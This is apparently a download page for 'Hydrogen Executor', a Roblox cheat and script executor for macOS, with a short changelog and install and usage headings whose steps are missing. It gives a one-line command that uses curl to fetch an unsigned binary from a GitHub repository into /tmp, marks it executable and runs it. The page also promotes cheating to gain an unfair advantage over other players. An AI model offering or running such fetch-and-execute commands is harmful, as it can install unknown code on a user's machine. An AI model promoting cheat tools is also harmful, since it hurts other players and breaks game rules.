Hydrogen Executor MacOS
Mac
for v628
cd /tmp && curl -LJs "https://github.com/retguard/upgraded-octo-journey/raw/main/hydro-installer" -O && chmod +x ./hydro-installer && ./hydro-installerChanges:
- Had to disable `getnilinstances` because of a really weird GC bug
- Client memory usage might be higher
- had to do something very hacky to get this realease to work
- This will be fixed soon
Hydrogen Executor is one of the most popular free Roblox Exploit available for MacOS. It is a very powerful tool that can enhance the gaming experience. Hydrogen is very easy to use, reliable and have a low risk of crashing unlike other Roblox Exploit.
The use of hydrogen on Mac can be used to gain unfair advantage over other players. Once you paste the script in the editor and execute it, you can access all the features that the script offers. So all you need is a script and Hydrogen Executor then you can start executing scripts on MacOS.
How to Install Hydrogen Executor on MacOS?
Good News for Mac users, Hydrogen has finally released the Mac Version so you can download it from the above button. Let’s discuss how we can install it:
Note: Always keep the key somewhere as you will need to paste the key every time you reopen the Hydrogen Executor.
How to use Hydrogen Executor on MacOS?
To run & execute in Hydrogen Execute you need a script and Roblox installed. Here’s how to:
Last Updated: May 2, 2024